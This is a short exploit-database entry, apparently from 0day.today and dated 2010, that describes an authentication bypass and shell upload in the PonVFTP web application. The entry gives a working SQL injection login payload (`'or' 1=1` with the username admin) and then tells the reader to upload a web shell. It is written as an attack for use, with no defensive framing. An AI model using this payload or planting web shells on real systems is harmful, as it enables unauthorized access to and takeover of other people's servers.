id: 10676
date: 01/15/2010
title: PonVFTP Bypass and Shell Upload Vulnerability
author: S2K9
cves: 

=============================================
PonVFTP Bypass and Shell Upload Vulnerability
=============================================

in the name of allah
 
# Exploit Title: PonVFTP Bbypass Vulnerability
# Date: 15/1/2010
 
# Author:S2K9
# Software home: http://pongles.com/index.php
 
# Tested on: windows xp sp2
 
Dork :in u r dream
 
exploit : press login >>>
username : admin
password : 'or' 1=1
press in
yaaaaay u r in hehe
good look
go to browse and upload your shell



#  0day.today [2023-03-27]  #